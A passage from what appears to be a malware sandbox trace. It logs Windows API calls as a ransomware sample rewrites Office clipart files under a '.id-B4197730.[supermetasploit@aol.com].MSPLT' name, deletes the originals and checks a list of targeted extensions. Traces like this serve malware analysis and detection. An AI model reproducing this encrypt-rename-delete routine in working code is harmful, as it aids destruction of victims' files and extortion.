dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.782] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0297.783] GetLastError () returned 0x0 [0297.783] ReadFile (in: hFile=0x4c0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x32b6, lpOverlapped=0x0) returned 1 [0297.786] WriteFile (in: hFile=0x464, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x32c0, lpOverlapped=0x0) returned 1 [0297.788] ReadFile (in: hFile=0x4c0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0297.788] WriteFile (in: hFile=0x464, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0297.788] SetEndOfFile (hFile=0x464) returned 1 [0297.788] CloseHandle (hObject=0x464) returned 1 [0297.793] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.793] SetEndOfFile (hFile=0x4c0) returned 1 [0297.798] CloseHandle (hObject=0x4c0) returned 1 [0297.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0297.799] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0297.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.800] lstrlenW (lpString=".doc") returned 4 [0297.800] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.800] lstrlenW (lpString=".docx") returned 5 [0297.800] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.800] lstrlenW (lpString=".pdf") returned 4 [0297.800] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.800] lstrlenW (lpString=".xls") returned 4 [0297.800] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.800] lstrlenW (lpString=".xlsx") returned 5 [0297.800] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.800] lstrlenW (lpString=".ppt") returned 4 [0297.800] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.800] lstrlenW (lpString=".zip") returned 4 [0297.800] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.801] lstrlenW (lpString=".rar") returned 4 [0297.801] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.801] lstrlenW (lpString=".bz2") returned 4 [0297.801] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.801] lstrlenW (lpString=".7z") returned 3 [0297.801] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.801] lstrlenW (lpString=".dbf") returned 4 [0297.801] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.801] lstrlenW (lpString=".1cd") returned 4 [0297.801] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.801] lstrlenW (lpString=".jpg") returned 4 [0297.801] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.802] lstrlenW (lpString=".doc") returned 4 [0297.802] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0297.802] lstrlenW (lpString=".docx") returned 5 [0297.802] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0297.802] lstrlenW (lpString=".pdf") returned 4 [0297.802] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0297.802] lstrlenW (lpString=".xls") returned 4 [0297.802] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0297.802] lstrlenW (lpString=".xlsx") returned 5 [0297.802] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0297.802] lstrlenW (lpString=".ppt") returned 4 [0297.802] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0297.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.802] lstrlenW (lpString=".zip") returned 4 [0297.802] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0297.802] lstrlenW (lpString=".rar") returned 4 [0297.802] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0297.802] lstrlenW (lpString=".bz2") returned 4 [0297.802] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0297.803] lstrlenW (lpString=".7z") returned 3 [0297.803] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0297.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.803] lstrlenW (lpString=".dbf") returned 4 [0297.803] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0297.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.803] lstrlenW (lpString=".1cd") returned 4 [0297.803] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0297.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 68 [0297.803] lstrlenW (lpString=".jpg") returned 4 [0297.803] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0297.803] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0297.803] lstrlenW (lpString="BD19827_.WMF") returned 12 [0297.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.283] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=9710) returned 1 [0298.283] CloseHandle (hObject=0x454) returned 1 [0298.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf")) returned 0x220 [0298.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.284] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.284] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.285] GetLastError () returned 0x0 [0298.285] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x25ee, lpOverlapped=0x0) returned 1 [0298.288] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x25f0, lpOverlapped=0x0) returned 1 [0298.290] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.290] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.290] SetEndOfFile (hFile=0x42c) returned 1 [0298.290] CloseHandle (hObject=0x42c) returned 1 [0298.291] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.292] SetEndOfFile (hFile=0x454) returned 1 [0298.325] CloseHandle (hObject=0x454) returned 1 [0298.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0298.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.327] lstrlenW (lpString=".doc") returned 4 [0298.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.327] lstrlenW (lpString=".docx") returned 5 [0298.327] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.328] lstrlenW (lpString=".pdf") returned 4 [0298.328] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.328] lstrlenW (lpString=".xls") returned 4 [0298.328] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.328] lstrlenW (lpString=".xlsx") returned 5 [0298.328] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.328] lstrlenW (lpString=".ppt") returned 4 [0298.328] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.328] lstrlenW (lpString=".zip") returned 4 [0298.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.328] lstrlenW (lpString=".rar") returned 4 [0298.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.328] lstrlenW (lpString=".bz2") returned 4 [0298.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.328] lstrlenW (lpString=".7z") returned 3 [0298.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.328] lstrlenW (lpString=".dbf") returned 4 [0298.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.328] lstrlenW (lpString=".1cd") returned 4 [0298.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.328] lstrlenW (lpString=".jpg") returned 4 [0298.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.329] lstrlenW (lpString=".doc") returned 4 [0298.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.329] lstrlenW (lpString=".docx") returned 5 [0298.329] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.329] lstrlenW (lpString=".pdf") returned 4 [0298.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.329] lstrlenW (lpString=".xls") returned 4 [0298.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.329] lstrlenW (lpString=".xlsx") returned 5 [0298.329] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.329] lstrlenW (lpString=".ppt") returned 4 [0298.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.329] lstrlenW (lpString=".zip") returned 4 [0298.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.329] lstrlenW (lpString=".rar") returned 4 [0298.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.329] lstrlenW (lpString=".bz2") returned 4 [0298.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.329] lstrlenW (lpString=".7z") returned 3 [0298.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.329] lstrlenW (lpString=".dbf") returned 4 [0298.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.330] lstrlenW (lpString=".1cd") returned 4 [0298.330] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0298.330] lstrlenW (lpString=".jpg") returned 4 [0298.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.330] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.330] lstrlenW (lpString="BL00012_.WMF") returned 12 [0298.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.331] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=9818) returned 1 [0298.331] CloseHandle (hObject=0x454) returned 1 [0298.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf")) returned 0x220 [0298.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.332] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.332] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.332] GetLastError () returned 0x0 [0298.333] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x265a, lpOverlapped=0x0) returned 1 [0298.335] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x2660, lpOverlapped=0x0) returned 1 [0298.337] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.337] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.338] SetEndOfFile (hFile=0x42c) returned 1 [0298.338] CloseHandle (hObject=0x42c) returned 1 [0298.339] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.339] SetEndOfFile (hFile=0x454) returned 1 [0298.346] CloseHandle (hObject=0x454) returned 1 [0298.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf")) returned 1 [0298.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.348] lstrlenW (lpString=".doc") returned 4 [0298.348] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.348] lstrlenW (lpString=".docx") returned 5 [0298.348] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.348] lstrlenW (lpString=".pdf") returned 4 [0298.348] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.348] lstrlenW (lpString=".xls") returned 4 [0298.348] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.348] lstrlenW (lpString=".xlsx") returned 5 [0298.348] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.348] lstrlenW (lpString=".ppt") returned 4 [0298.348] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.349] lstrlenW (lpString=".zip") returned 4 [0298.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.349] lstrlenW (lpString=".rar") returned 4 [0298.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString=".bz2") returned 4 [0298.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString=".7z") returned 3 [0298.349] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.349] lstrlenW (lpString=".dbf") returned 4 [0298.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.349] lstrlenW (lpString=".1cd") returned 4 [0298.349] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.349] lstrlenW (lpString=".jpg") returned 4 [0298.349] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.349] lstrlenW (lpString=".doc") returned 4 [0298.349] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.349] lstrlenW (lpString=".docx") returned 5 [0298.349] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.350] lstrlenW (lpString=".pdf") returned 4 [0298.350] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.350] lstrlenW (lpString=".xls") returned 4 [0298.350] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.350] lstrlenW (lpString=".xlsx") returned 5 [0298.350] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.350] lstrlenW (lpString=".ppt") returned 4 [0298.350] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.350] lstrlenW (lpString=".zip") returned 4 [0298.350] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.350] lstrlenW (lpString=".rar") returned 4 [0298.350] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.350] lstrlenW (lpString=".bz2") returned 4 [0298.350] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.350] lstrlenW (lpString=".7z") returned 3 [0298.350] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.350] lstrlenW (lpString=".dbf") returned 4 [0298.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.350] lstrlenW (lpString=".1cd") returned 4 [0298.350] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0298.350] lstrlenW (lpString=".jpg") returned 4 [0298.350] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.351] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.351] lstrlenW (lpString="BL00045_.WMF") returned 12 [0298.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.352] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=7862) returned 1 [0298.352] CloseHandle (hObject=0x454) returned 1 [0298.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf")) returned 0x220 [0298.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.352] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.353] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 